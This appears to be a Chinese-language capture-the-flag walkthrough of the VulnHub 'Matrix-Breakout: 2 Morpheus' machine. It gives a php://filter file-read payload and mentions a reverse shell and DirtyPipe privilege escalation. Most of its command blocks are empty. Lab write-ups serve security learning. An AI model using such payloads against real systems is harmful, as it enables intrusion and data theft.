Matrix-Breakout:2 Morpheus
博客原地址:https://www.cnblogs.com/hirak0/articles/18105800(靶机没部署起来)
项目地址:https://download.vulnhub.com/matrix-breakout/matrix-breakout-2-morpheus.ova
是一个打包好的镜像文件
注意:导入 ova 时一定要选择我已移动,否则没网
使用 Nmap 扫描出开放服务及操作系统版本
1 | ┌──(root㉿MYsec)-[/home/hirak0] |
任意文件读取
file
扫描后台目录
1 | ┌──(root㉿MYsec)-[/home/hirak0] |
访问过去


抓包发现有隐藏参数,推测任意文件读取漏洞

利用 PHP 伪协议读取一下 graffiti.php 的内容
1 | php://filter/read=convert.base64-encode/resource=graffiti.php |

RCE
message
1 |
|
由于两个参数都是由用户可控,所以我们可以直接写入反弹 Shell

1 | ┌──(root㉿MYsec)-[/home/hirak0] |
提权
DirtyPipe(CVE-2022-0847)
